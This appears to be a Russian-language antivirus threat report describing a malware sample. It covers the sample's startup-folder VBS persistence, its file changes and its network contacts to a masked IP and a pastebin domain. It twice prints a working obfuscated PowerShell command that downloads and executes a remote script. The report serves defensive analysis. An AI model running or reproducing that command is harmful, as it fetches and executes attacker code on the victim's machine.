Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\nosleep.vbs
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('https://pastebin.com/raw/STGGsHfq')
Изменения в файловой системе
Создает следующие файлы
- %APPDATA%\nosleep.vbs
Сетевая активность
Подключается к
- 'pa###bin.com':443
- '19#.#7.97.172':1111
TCP
Запросы HTTP POST
- http://19#.##.97.172:1111/ready via 19#.#7.97.172
UDP
- DNS ASK pa###bin.com
- DNS ASK k.###4top.io
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%APPDATA%\NoSleep.vbs"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' IEX (New-Object('Net.WebClient')).'DoWnloAdsTrInG'('https://pastebin.com/raw/STGGsHfq')' (со скрытым окном)
